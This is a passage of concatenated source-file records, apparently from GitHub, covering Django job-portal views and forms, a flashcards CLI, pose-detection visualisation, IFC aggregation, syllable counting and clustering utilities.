requires the publish_to date to be set\n        #\n        if self.cleaned_data.get('remove_after_publish_to') and \\\n           not self.cleaned_data.get('publish_to'):\n            raise forms.ValidationError(_(u\"You must set the publish to date\"))\n\n        return self.cleaned_data\n\n    def clean_parentusergroup(self):\n\n        \"\"\"The parentusergroup requires some special attention: it is not\n        required, but users need to make that choice explicitly.\n        \"\"\"\n\n        group = self.cleaned_data.get('parentusergroup')\n\n        if group == -1:\n            # Translators: djinn_contenttypes parentusergroup required\n            raise forms.ValidationError(_(u\"Make a choice\"))\n\n        return group\n","repo_name":"PythonUnited/djinn_contenttypes","sub_path":"djinn_contenttypes/forms/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"43160148150","text":"from django.shortcuts import render\nfrom .models import Company,Jobs,SkillForJobs\nfrom rest_framework import filters\nfrom Candidate.models import(\n JobenquiryC\n)\nimport requests\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django.shortcuts import render, get_object_or_404\nfrom rest_framework.permissions import AllowAny\n\nfrom rest_framework.decorators import (\n api_view,\n permission_classes,\n)\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import companyserializer,jobserializer,jobReadserializer,ResultSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework import viewsets\nfrom Candidate.models import (\n Recruit\n)\nfrom Candidate.serializers import(\n ApplicationSerializer\n)\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework import generics\n\nclass Companyprofile(APIView):\n permission_classes = [IsAuthenticated]\n authentication_classes = (TokenAuthentication,)\n def post(self, request, *args, **kwargs):\n context={}\n data={}\n if request.user.Is_Organization == 1:\n serializer = companyserializer(data=request.data)\n if serializer.is_valid():\n serializer.save(User=self.request.user)\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfully created\"\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n context['sucess']=False\n context['status']=400\n context['message']=\"error\"\n data=serializer.errors\n context['data']=data\n return Response(context)\n\n else:\n return Response( status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, *args, **kwargs):\n if request.user.Is_Organization == 1:\n context={}\n data={}\n try:\n obj=get_object_or_404(Company,User=request.user)\n except:\n context['sucess']=False\n context['status']=404\n context['message']=\"profile not created\"\n context['data']=data\n return Response(context)\n\n serializer = companyserializer(obj)\n context['sucess']=True\n context['status']=200\n context['message']=\"already exist\"\n data=serializer.data\n context['data']=data\n return Response(context)\n\n def put(self, request, *args, **kwargs):\n if request.user.Is_Candidate == 1:\n obj=get_object_or_404(Company,User=request.user)\n serializer = companyserializer(obj,data=request.data)\n context={}\n data={}\n if serializer.is_valid():\n serializer.save(User=self.request.user)\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfully done\"\n data=serializer.data\n context['data']=data\n return Response(context)\n context['sucess']=False\n context['status']=400\n context['message']=\"not done\"\n data=serializer.errors\n context['data']=data\n return Response(context)\n\n\nclass jobviewset(viewsets.ModelViewSet):\n serializer_class = jobserializer\n queryset=Jobs.objects.all()\n permission_classes = [IsAuthenticated]\n authentication_classes = (TokenAuthentication,)\n\n http_method_names=['get','post','put','delete']\n def create(self, request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=Company.objects.get(User=request.user)\n serializer=jobserializer(data=request.data, context={'request':request})\n if serializer.is_valid():\n 
profile=serializer.save(by=companyobj)\n print(profile)\n context['sucess']=True\n context['response']=\"sucessfull\"\n text=serializer.validated_data['Job_Descreption']\n url=\"http://sihml.pythonanywhere.com/analysis/skills-get/\"\n params = {'Txt': text}\n response = requests.post(url, data=params)\n print(response.json())\n x=Jobs.objects.get(id =profile.id)\n print(x)\n for i in response.json():\n obj,c=SkillForJobs.objects.get_or_create(Name=i)\n print(obj)\n x.SkillRequired.add(obj)\n x.save()\n context['status']=200\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n return Response(serializer.errors)\n\n\n def list(self, request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=get_object_or_404(Company,User=user)\n queryset=Jobs.objects.filter(by=companyobj)\n context['sucess']=True\n context['status']=200\n context['response']=\"sucessfull\"\n serializer = jobserializer(queryset,many=True)\n data=serializer.data\n context['data']=data\n return Response(context)\n def post(self,request,*kwargs):\n context={}\n data={}\n user=self.request.user\n companyobj=get_object_or_404(Company,User=user)\n serializer=jobserializer(data=request.data)\n if serializer.is_valid():\n serializer.save(by=companyobj)\n context['sucess']=True\n context['response']=\"sucessfull\"\n context['status']=200\n data=serializer.data\n context['data']=data\n return Response(context)\n\n\n@api_view(['POST', ])\n@permission_classes((AllowAny, ))\ndef Recommendedjobs(request):\n if request.method=='POST':\n serializer=ResultSerializer(data=request.data)\n if serializer.is_valid():\n first=serializer.data['first']\n Second=serializer.data['Second']\n third=serializer.data['third']\n fourth=serializer.data['fourth']\n final=Jobs.objects.none().distinct()\n print(first , Second , third , fourth, )\n jobsqs=Jobs.objects.all()\n print(jobsqs)\n jobsqscount=jobsqs.count()\n first_ratio=0.4*jobsqscount\n Second_ratio=0.3*jobsqscount\n third_ratio=0.2*jobsqscount\n fourth_ratio=0.1*jobsqscount\n final=Jobs.objects.none().distinct()\n final=final|Jobs.objects.filter(SubDomain=first)[:first_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:Second_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:third_ratio]\n final=final|Jobs.objects.filter(SubDomain=first)[:fourth_ratio]\n finalqs=jobReadserializer(final,many=True)\n data={}\n context={}\n context['sucess']=True\n context['status']=200\n context['count']=jobsqscount\n context['message']=\"sucessfull get\"\n data=finalqs.data\n context['data']=data\n return Response (context)\n else:\n context['sucess']=False\n context['status']=401\n context['message']=serializer.errors\n context['data']=data\n return Response (context)\n\n\n\nclass AllJobViews(generics.ListCreateAPIView):\n queryset=Jobs.objects.all()\n serializer_class = jobReadserializer\n search_fields = ['^job_title','by__Name']\n filter_backends = (filters.SearchFilter,)\n def list(self,request,*args,**kwargs):\n self.object_list=self.filter_queryset(self.get_queryset())\n serializer=self.get_serializer(self.object_list,many=True)\n context={}\n data={}\n context['sucess']=True\n context['status']=200\n context['response']=\"sucessfull\"\n context['count']=self.object_list.count()\n data=serializer.data\n context['data']=data\n return Response(context)\n\n@api_view(['GET', ])\n@permission_classes((IsAuthenticated, ))\ndef list_of_application(request,id):\n context={}\n data={}\n if request.user.Is_Organization==0:\n context['sucess']=False\n 
context['status']=400\n context['message']=\"unsucessfull get\"\n context['data']=data\n return Response(context)\n\n obj=get_object_or_404(Jobs,pk=id)\n if request.user == obj.by.User:\n qs=JobenquiryC.objects.filter(job=obj).order_by(\"-similarity\")\n context['sucess']=True\n context['status']=200\n context['message']=\"sucessfull get\"\n context['count']=qs.count()\n serializer=ApplicationSerializer(qs,many=True)\n data=serializer.data\n context['data']=data\n return Response(context)\n else:\n context['sucess']=False\n context['status']=400\n context['message']=\" unauthorised acess\"\n context['data']=data\n return Response(context)\n\n","repo_name":"HarshilShrivastava/SIH-Backend","sub_path":"Hackathon/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9302,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"}
+{"seq_id":"37445019701","text":"import io\nimport random\nimport argparse\n\n\nclass Flashcards:\n def __init__(self, output, import_file, export_file):\n self.cards = {}\n self.output = output\n self.import_file = import_file\n self.export_file = export_file\n\n def menu(self):\n if self.import_file is not None:\n self.import_cards(self.import_file)\n while True:\n self.my_print('Input the action (add, remove, import, export, ask, exit, log, hardest card, reset stats):')\n command = input()\n self.my_print(command, console=False)\n if command == \"add\":\n self.add_card()\n elif command == \"remove\":\n self.remove_card()\n elif command == \"import\":\n self.import_cards()\n elif command == \"export\":\n self.export_cards()\n elif command == \"ask\":\n self.ask_cards()\n elif command == \"exit\":\n print('Bye bye!')\n if self.export_file is not None:\n self.export_cards(self.export_file)\n break\n elif command == 'log':\n self.custom_log()\n elif command == \"hardest card\":\n self.hardest_cards()\n elif command == \"reset stats\":\n self.reset_stats()\n self.my_print('')\n\n def custom_log(self):\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n with open(file_name, \"w\") as f:\n f.write(self.output.getvalue())\n print('The log has been saved.')\n\n def reset_stats(self):\n for i in self.cards.values():\n i[1] = 0\n self.my_print(\"Card statistics have been reset.\")\n\n def hardest_cards(self):\n if len(self.cards) == 0:\n hardest_card = 0\n else:\n hardest_card = max([mistakes for definition, mistakes in self.cards.values()])\n if hardest_card == 0:\n self.my_print(\"There are no cards with errors.\")\n else:\n hardest_card_dict = dict(filter(lambda elem: elem[1][1] == hardest_card, self.cards.items()))\n data = list(hardest_card_dict.values())\n if len(hardest_card_dict) == 1:\n name_hardest_card = next(iter(hardest_card_dict.keys()))\n self.my_print(f'The hardest card is \"{name_hardest_card}\". You have {hardest_card} errors answering it')\n else:\n str_terms = [f'\"{term}\"' for term, mistakes in data]\n hardest_card_str = ', '.join(str_terms)\n self.my_print(f\"The hardest cards are {hardest_card_str}.\")\n\n def add_card(self):\n self.my_print('The card:')\n term = input()\n self.my_print(term, console=False)\n while True:\n if term in self.cards.keys():\n self.my_print(f'The card \"{term}\" already exists. Try again:')\n term = input()\n self.my_print(term, console=False)\n continue\n break\n self.my_print('The definition of the card:')\n definition = input()\n self.my_print(definition, console=False)\n while True:\n definitions = [data[0] for data in self.cards.values()]\n if definition in definitions:\n self.my_print(f'The definition \"{definition}\" already exists. 
Try again:')\n definition = input()\n self.my_print(definition, console=False)\n continue\n break\n self.cards[term] = [definition, 0]\n self.my_print(f'The pair (\"{term}\":\"{definition}\") has been added')\n\n def remove_card(self):\n self.my_print('Which card?')\n term = input()\n self.my_print(term, console=False)\n try:\n self.cards.pop(term)\n except KeyError:\n self.my_print(f\"Can't remove \\\"{term}\\\": there is no such card.\")\n else:\n self.my_print('The card has been removed.')\n\n def import_cards(self, file_name=None):\n if file_name is None:\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n try:\n with open(file_name, 'r') as file:\n lines = file.readlines()\n for line in lines:\n term, definition, mistakes = line.split()\n self.cards[term] = [definition, int(mistakes)]\n if len(lines) > 0:\n self.my_print(f\"{len(lines)} cards have been loaded.\")\n except FileNotFoundError:\n self.my_print('File not found.')\n\n def export_cards(self, file_name=None):\n if file_name is None:\n self.my_print(\"File name:\")\n file_name = input()\n self.my_print(file_name, console=False)\n with open(file_name, 'w', encoding=\"utf-8\") as file:\n for term, data in self.cards.items():\n file.write('{0} {1} {2}\\n'.format(term, data[0], data[1]))\n self.my_print(f\"{len(self.cards)} cards have been saved\")\n\n def ask_cards(self):\n self.my_print(\"How many times to ask?\")\n count = int(input())\n self.my_print(str(count), console=False)\n for _ in range(count):\n term = random.choice(list(self.cards.keys()))\n definition = self.cards[term][0]\n definitions = [data[0] for data in self.cards.values()]\n self.my_print(f'Print the definition of \"{term}\":')\n answer = input()\n self.my_print(answer, console=False)\n if answer == definition:\n self.my_print('Correct!')\n else:\n if answer in definitions:\n index = definitions.index(answer)\n list_terms = list(self.cards)\n self.my_print(f'Wrong. The right answer is \"{definition}\", '\n f'but your definition is correct for \"{list_terms[index]} card.\"')\n else:\n self.my_print(f'Wrong. The right answer is \"{definition}\".')\n self.cards[term][1] += 1\n\n def my_print(self, message: str, console=True) -> None:\n if console:\n print(message)\n print(message, file=self.output)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--import_from\")\n parser.add_argument(\"--export_to\")\n args = parser.parse_args()\n import_file = args.import_from\n export_file = args.export_to\n output = io.StringIO()\n my_cards = Flashcards(output, import_file, export_file)\n my_cards.menu()\n output.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NikolayRudko/My_Flashcards","sub_path":"flashcards.py","file_name":"flashcards.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72037795430","text":"# 보충 교수님 코드\n\n# 백만장자 프로젝트\n# 뒤에서부터 최댓값을 비교하여 최댓값이 갱신될 때 까지 차이를 이윤으로 누적하는 방식\n# 1개씩만 살 수 있으니까 앞에 더 큰 값이 나오면 무조건 그 날에 파는것이 이득이라서..!!(?맞게 이해한건지는 모르겠음)\n\nimport sys\nsys.stdin = open(\"1859.txt\")\n\n# 인덱스 연습\n# 오른쪽으로 오는 것도 이해 못할 정도로 복잡한 코드 아니니.....!!\n# 설명을 들었을 때 아~~ 그렇게 구현하면 되겠구나 하고 구현할 수 있을 정도로 연습이 되어있어야 한다\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost = list(map(int, input().split()))\n\n s = 0 # 총 이익\n maxV = cost[N-1] # 마지막 날 가격으로 초기화\n\n for i in range(N-2, -1, -1):\n if maxV > cost[i]: # 이익을 남길 수 있는 경우\n s += maxV - cost[i]\n maxV = max(maxV, cost[i])\n print(f'#{tc} {s}')\n\n\n\n'''\n# im시험의 주 목적 : 인덱스 연습\n# 시간초과 - im수준에서는 시간초과는 잘 안나긴 함... # 모든구간에서의 최대값 찾기\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n cost = list(map(int, input().split()))\n\n s = 0 # 총 이익\n\n for i in range(N-1): # 물건 구입으 고려하는 날(마지막날은 제외)\n maxV = cost[i+1] #팔수있는 구간의 첫번째날 가격\n for j in range(i+2, N): # 팔 수 있는 모든 날 중에\n if maxV < cost[j]:\n maxV = cost[j]\n if cost[i] < maxV:\n s += maxV - cost[i] # i날 물건을 사서 이익을 남길 수 있으면...\n print(f'#{tc} {s}')\n'''","repo_name":"chan-bam/Algorithm-Study","sub_path":"swea/swea1859-백만장자 프로젝트-.py","file_name":"swea1859-백만장자 프로젝트-.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"6269305229","text":"from datetime import datetime, timedelta\nfrom typing import Optional\n\nimport numpy as np\nfrom bson.objectid import ObjectId\nfrom discord_analyzer.DB_operations.mongodb_access import DB_access\n\n\ndef setup_db_guild(\n db_access: DB_access,\n guildId: str = \"1234\",\n discordId_list: list[str] = [\"973993299281076285\"],\n discordId_isbot: list[bool] = [False],\n dates: Optional[list[datetime]] = None,\n days_ago_period: int = 30,\n):\n \"\"\"\n Remove the guild from Core databse and then insert it there\n also drop the guildId database and re-create\n it then create the guildmembers collection in it\n\n `discordId_isbot` is representative if each user is bot or not\n \"\"\"\n platform_id = \"515151515151515151515151\"\n\n db_access.db_mongo_client[\"Core\"][\"platforms\"].delete_one(\n {\"_id\": ObjectId(platform_id)}\n )\n db_access.db_mongo_client.drop_database(guildId)\n\n action = {\n \"INT_THR\": 1,\n \"UW_DEG_THR\": 1,\n \"PAUSED_T_THR\": 1,\n \"CON_T_THR\": 4,\n \"CON_O_THR\": 3,\n \"EDGE_STR_THR\": 5,\n \"UW_THR_DEG_THR\": 5,\n \"VITAL_T_THR\": 4,\n \"VITAL_O_THR\": 3,\n \"STILL_T_THR\": 2,\n \"STILL_O_THR\": 2,\n \"DROP_H_THR\": 2,\n \"DROP_I_THR\": 1,\n }\n db_access.db_mongo_client[\"Core\"][\"platforms\"].insert_one(\n {\n \"_id\": ObjectId(platform_id),\n \"name\": \"discord\",\n \"metadata\": {\n \"id\": guildId,\n \"icon\": \"111111111111111111111111\",\n \"name\": \"A guild\",\n \"selectedChannels\": [\"1020707129214111827\"],\n \"window\": {\"period_size\": 7, \"step_size\": 1},\n \"action\": action,\n \"period\": datetime.now() - timedelta(days=days_ago_period),\n },\n \"community\": ObjectId(\"aabbccddeeff001122334455\"),\n \"disconnectedAt\": None,\n \"connectedAt\": (datetime.now() - timedelta(days=days_ago_period + 10)),\n \"isInProgress\": True,\n \"createdAt\": datetime(2023, 11, 1),\n \"updatedAt\": datetime(2023, 11, 1),\n }\n )\n\n if dates is None:\n dates_using = np.repeat(\n datetime.now() - timedelta(days=10), len(discordId_list)\n )\n else:\n dates_using = dates\n\n # just to create the data we're inserting one by one\n # it's not the most efficient way\n\n # if the isBot parameters was not set\n # set all the users to not to be a bot\n if len(discordId_isbot) != len(discordId_list):\n user_data = zip(discordId_list, [False] * len(discordId_list))\n else:\n user_data = zip(discordId_list, discordId_isbot)\n\n for idx, (discordId, isbot) in enumerate(user_data):\n db_access.db_mongo_client[guildId][\"guildmembers\"].insert_one(\n {\n \"discordId\": discordId,\n \"username\": f\"sample_user_{idx}\",\n \"roles\": [\"1012430565959553145\"],\n \"joinedAt\": dates_using[idx],\n \"avatar\": \"3ddd6e429f75d6a711d0a58ba3060694\",\n \"isBot\": isbot,\n \"discriminator\": \"0\",\n }\n )\n","repo_name":"TogetherCrew/discord-analyzer","sub_path":"tests/integration/utils/remove_and_setup_guild.py","file_name":"remove_and_setup_guild.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11503560942","text":"import torch, torch.nn, torchvision, numpy as np\nimport cv2\n\ndef get_resnet50():\n from torchvision.models.detection import \\\n fasterrcnn_resnet50_fpn_v2, \\\n FasterRCNN_ResNet50_FPN_V2_Weights\n from torchvision.models.detection import \\\n keypointrcnn_resnet50_fpn, \\\n KeypointRCNN_ResNet50_FPN_Weights\n\n if 0:\n weights = FasterRCNN_ResNet50_FPN_V2_Weights.DEFAULT\n model = fasterrcnn_resnet50_fpn_v2(\n weights=weights,\n box_score_thresh=.9).eval().cuda()\n model.weights = weights\n else:\n weights = KeypointRCNN_ResNet50_FPN_Weights.COCO_V1\n model = keypointrcnn_resnet50_fpn(\n weights=weights,\n box_score_thresh=.9).eval().cuda()\n model.weights = weights\n\n return model\n\ndef run_model(model, img):\n with torch.no_grad():\n x = torch.from_numpy(img).cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n x = model.weights.transforms()(x)\n return model(x)\n\ndef get_coco_skeleton():\n skeletonVertices_ = {\n 0: 'eye',\n 1: 'ear',\n 2: 'shoulder',\n 3: 'elbow',\n 4: 'hand',\n 5: 'hip',\n 6: 'knee',\n 7: 'foot' }\n\n skeletonVertices = {\n 0: 'nose',\n }\n skeletonVertices.update({k*2+1: 'l_'+v for k,v in skeletonVertices_.items()})\n skeletonVertices.update({k*2+2: 'r_'+v for k,v in skeletonVertices_.items()})\n skeletonVerticesInv = {v:k for k,v in skeletonVertices.items()}\n\n skeletonIndices_ = [\n 'nose', 'l_eye',\n 'l_eye', 'l_ear',\n 'l_ear', 'l_shoulder',\n 'l_shoulder', 'l_elbow',\n 'l_elbow', 'l_hand',\n 'l_shoulder', 'l_hip',\n 'l_hip', 'l_knee',\n 'l_knee', 'l_foot',\n\n 'nose', 'r_eye',\n 'r_eye', 'r_ear',\n 'r_ear', 'r_shoulder',\n 'r_shoulder', 'r_elbow',\n 'r_elbow', 'r_hand',\n 'r_shoulder', 'r_hip',\n 'r_hip', 'r_knee',\n 'r_knee', 'r_foot',\n\n 'l_shoulder', 'r_shoulder',\n 'l_hip', 'r_hip' ]\n skeletonIndices = [\n (skeletonVerticesInv[a],skeletonVerticesInv[b]) for a,b in \\\n zip(skeletonIndices_[0::2], skeletonIndices_[1::2],)\n ]\n\n return skeletonIndices, skeletonVerticesInv\n\nclass FasterRcnnModel():\n def __init__(self, model):\n self.model = model\n self.skeletonIndices, self.skeletonVerticesInv = get_coco_skeleton()\n print('Faster RCNN Skeleton:')\n from pprint import pprint\n pprint(self.skeletonVerticesInv)\n\n def forward(self, x):\n with torch.no_grad():\n if isinstance(x, np.ndarray):\n x = torch.from_numpy(x).cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n else:\n assert isinstance(x, torch.Tensor)\n assert x.dtype == torch.float32 or x.dtype == torch.uint8\n if x.dtype == torch.float32:\n x = x.cuda().unsqueeze_(0).permute(0,3,1,2)\n else:\n x = x.cuda().float().div_(255).unsqueeze_(0).permute(0,3,1,2)\n\n x = self.model.weights.transforms()(x)\n return self.model(x)\n\n def __call__(self, x): return self.forward(x)\n\n def show_viz(self, img, boxes, keypointss, kscores, show=True):\n for box in boxes.cpu().numpy():\n pt1 = box[:2].astype(int)\n pt2 = box[2:].astype(int)\n cv2.rectangle(img, pt1,pt2, (0,255,0), 1)\n\n textImg = img*0\n circImg = img*0\n\n for keypoints in keypointss.cpu().numpy():\n for i, kpt in enumerate(keypoints):\n if kpt[2] > .5:\n pt = kpt[:2].astype(int)\n pt1 = kpt[:2].astype(int) + (1,0)\n score = kscores.view(-1)[i].sigmoid().item()\n c = (255-int(score*255),int(score*255),0)\n cv2.circle(circImg, pt, 4, c, 1)\n # print(pt,score)\n cv2.putText(textImg, str(i), pt1, 0, .6, (0,0,0))\n cv2.putText(textImg, str(i), pt, 0, .6, c)\n\n for keypoints in keypointss.cpu().numpy():\n for (a,b) in self.skeletonIndices:\n if keypoints[a,2].item() > .5 and 
keypoints[b,2].item() > .5:\n                    pta = keypoints[a,:2].astype(int)\n                    ptb = keypoints[b,:2].astype(int)\n                    scorea = kscores.view(-1)[a].sigmoid().item()\n                    scoreb = kscores.view(-1)[b].sigmoid().item()\n                    score = scorea * scoreb\n                    c = (255-int(score*255),int(score*255),0)\n                    cv2.line(img, pta, ptb, c)\n\n        img = cv2.addWeighted(img, 1, textImg, .3, 0)\n        img = cv2.addWeighted(img, 1, circImg, .6, 0)\n\n        if show:\n            cv2.imshow('img', img[...,::-1])\n            cv2.waitKey(0)\n        return img\n\n\ndef run_model_and_viz(m, img, show=True):\n    out = m(img)[0]\n    vimg = m.show_viz(img, out['boxes'], out['keypoints'], out['keypoints_scores'], show=show)\n\n    # out = run_model(m, img)[0]\n    # print(out)\n    # show_viz(img, out['boxes'], out['keypoints'], out['keypoints_scores'])\n    return out, vimg\n\nif __name__ == '__main__':\n    # img = np.copy(cv2.imread('data/me.jpg')[...,[2,1,0]], 'C')\n    img = np.copy(cv2.imread('data/me2.jpg')[...,[2,1,0]], 'C')\n    img = cv2.resize(img,(0,0),fx=.5,fy=.5)\n\n    m = get_resnet50()\n    m = FasterRcnnModel(m)\n\n    run_model_and_viz(m, img)\n","repo_name":"steplee/steplee.github.io","sub_path":"extraPages/xray/pysrc/est2d/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"23925407973","text":"import ifcopenshell\nimport ifcopenshell.api\n\n\nclass Usecase:\n def __init__(self, file, product=None):\n \"\"\"Unassigns a product from its aggregate\n\n A product (i.e. a smaller part of a whole) may be aggregated into zero\n or one larger space or element. This function will remove that\n aggregation relationship.\n\n As all physical IFC model elements must be part of a hierarchical tree\n called the \"spatial decomposition\", using this function will remove the\n product from that tree. This is a dangerous operation and may result in\n the product no longer being visible in IFC applications.\n\n If the product is not part of an aggregation relationship, nothing will\n happen.\n\n :param product: The part of the aggregate, typically an IfcElement or\n IfcSpatialStructureElement subclass\n :type product: ifcopenshell.entity_instance.entity_instance\n :return: The IfcRelAggregate relationship instance, only returned if the\n whole still contains any other parts.\n :rtype: ifcopenshell.entity_instance.entity_instance, None\n\n Example:\n\n .. code:: python\n\n element = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcSite\")\n subelement1 = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcBuilding\")\n subelement2 = ifcopenshell.api.run(\"root.create_entity\", model, ifc_class=\"IfcBuilding\")\n ifcopenshell.api.run(\"aggregate.assign_object\", model, product=subelement1, relating_object=element)\n ifcopenshell.api.run(\"aggregate.assign_object\", model, product=subelement2, relating_object=element)\n # The relationship is returned as element still has subelement2\n rel = ifcopenshell.api.run(\"aggregate.unassign_object\", model, product=subelement1)\n # Nothing is returned, as element is now empty\n ifcopenshell.api.run(\"aggregate.unassign_object\", model, product=subelement2)\n \"\"\"\n self.file = file\n self.settings = { \"product\": product }\n\n def execute(self):\n for rel in self.settings[\"product\"].Decomposes or []:\n if not rel.is_a(\"IfcRelAggregates\"):\n continue\n if len(rel.RelatedObjects) == 1:\n return self.file.remove(rel)\n related_objects = list(rel.RelatedObjects)\n related_objects.remove(self.settings[\"product\"])\n rel.RelatedObjects = related_objects\n ifcopenshell.api.run(\"owner.update_owner_history\", self.file, **{\"element\": rel})\n return rel\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/aggregate/unassign_object.py","file_name":"unassign_object.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"}
+{"seq_id":"72392520551","text":"import re, nltk, json\n\n# check for a letter or digit; https://docs.python.org/3/library/re.html\nnonPunct = re.compile('\\w')\n\nfrom nltk.corpus import cmudict\ndic = cmudict.dict()\nfrom collections import Counter\nfrom nltk import sent_tokenize, word_tokenize\n\ndef nsyl(word):\n \"\"\" Function that uses CMU dictionary from NLTK to count syllables in\n a word. If the word is unrecognized, return value will be None.\n\n If alternative pronunciations are found, function returns maximum\n value.\n \"\"\"\n if word in dic:\n pronunciations = dic[word]\n num_syls = [len([syl for syl in pron if re.findall('[0-9]', syl)])\n for pron in pronunciations]\n return max(num_syls)\n\ndef flatten(a_list):\n return [item for sublist in a_list for item in sublist]\n\ndef syllable_data(text):\n\n # Use NLTK to 'tokenize' text into sentences, then into words\n sents = sent_tokenize(text)\n word_tokens = flatten([word_tokenize(s) for s in sents])\n\n # Get words that have letters in them (this excludes pure punctuation\n # tokens like `,\n words = [w for w in word_tokens if nonPunct.match(w)]\n words_7 = [word for word in words if len(word)>=7]\n\n sylls = [nsyl(word.lower()) for word in words]\n syl_dict = {\n 'sent_count': len(sents),\n 'word_count': len(words),\n 'word_7_count': len(words_7),\n 'num_syllables': sum([syll for syll in sylls if syll is not None]),\n 'syllable_counts': \\\n Counter([syll for syll in sylls if syll is not None])}\n return json.dumps(syl_dict)\n\ndef get_long_words(text):\n\n words = [word.lower() for sent in nltk.sent_tokenize(text.decode('utf8'))\n for word in nltk.word_tokenize(sent)]\n\n # Require words to be more than three characters. Otherwise, \"edu\"=\"E-D-U\" => 3 syllables\n words = [word for word in words if nsyl(word)>=3 and len(word)>3]\n return words\n","repo_name":"iangow/streetevents_private","sub_path":"linguistic_features/syllable_count.py","file_name":"syllable_count.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"11369564059","text":"from time import time\n\nfrom sklearn import metrics\nimport torch\nimport numpy as np\n\n\nclass ClusterModel:\n \"\"\"\n Interface for cluster algorithm\n \"\"\"\n\n def __init__(self, model, cluster_helper):\n \"\"\"\n :param model: The clustering model used.\n :param cluster_helper: A ClusterHelper instance\n that avoids recomputing everything\n \"\"\"\n\n self.cluster_helper = cluster_helper\n\n self.model = model\n\n self.mapping = None\n\n def fit(self, train=None):\n \"\"\"\n Fit the cluster algorithm.\n\n :param train: training data\n \"\"\"\n if train is None:\n train = self.cluster_helper.unlabelled_embeddings\n\n self.model.fit(train)\n\n def predict(self, x):\n \"\"\"\n Make a prediction from x\n\n :param x: data to use to predict\n :return: prediction\n \"\"\"\n predictions = self.model.predict(x)\n return predictions\n\n def labelled_predict(self, x):\n \"\"\"\n Make a prediction and label it.\n\n :param x: data to use to predict\n :return: labeled prediction\n \"\"\"\n predictions = self.predict(x)\n return np.array([self.mapping.get(p, -1) for p in predictions])\n\n def create_mapping(self, valid=None, labels=None):\n \"\"\"\n Associate a label with each cluster from the train embeddings\n\n :param valid: split from the validition used for labeling\n :param labels:\n :return:\n \"\"\"\n if valid is None:\n valid = self.cluster_helper.train_embedding\n labels = self.cluster_helper.train_labels\n\n prediction = self.model.predict(valid)\n\n uniques = np.unique(prediction)\n\n self.mapping = dict()\n\n for u in uniques:\n filtered_labels = labels[prediction == u]\n\n if len(filtered_labels) != 0:\n values, counts = np.unique(filtered_labels, return_counts=True)\n self.mapping[u] = values[counts.argmax()]\n\n def full_fit(self, train=None, valid=None, labels=None):\n \"\"\"\n Performs the fit and labels the clusters.\n\n Args:\n train (np.array): Array of training examples.\n valid (np.array): Array of validation examples.\n labels (np.array): Array containing the labels of the validation examples.\n \"\"\"\n\n self.fit(train)\n self.create_mapping(valid, labels)\n\n\nclass ClusterHelper:\n \"\"\"\n Contains pre-computed\n \"\"\"\n\n def __init__(self, model, device, unlabelled_loader, train_loader,\n valid_loader):\n\n self.unlabelled_loader = unlabelled_loader\n self.train_loader = train_loader\n self.valid_loader = valid_loader\n\n self.train_labels = self.get_labels(train_loader)\n self.valid_labels = self.get_labels(valid_loader)\n\n self.unlabelled_embeddings = None\n self.train_embedding = None\n self.valid_embedding = None\n\n self.model = model\n self.device = device\n\n @staticmethod\n def get_labels(dataloader):\n \"\"\"\n Returns the labels from a dataloader as a numpy array.\n\n Args:\n dataloader (torch.utils.data.DataLoader): A labelled dataloader.\n\n Returns:\n labels (np.array): The labels contained in the dataloader.\n \"\"\"\n\n labels = []\n\n for _, label in dataloader:\n labels.append(label)\n\n labels = np.concatenate(labels)\n\n return labels.reshape(-1)\n\n def get_embeddings(self, dataloader):\n \"\"\"\n Returns the latent representation of the dataset loaded by the dataloader,\n as a numpy array.\n\n Args:\n dataloader (torch.utils.data.DataLoader): The dataloader.\n\n Returns:\n embeddings (np.array): The embedding of the dataset.\n 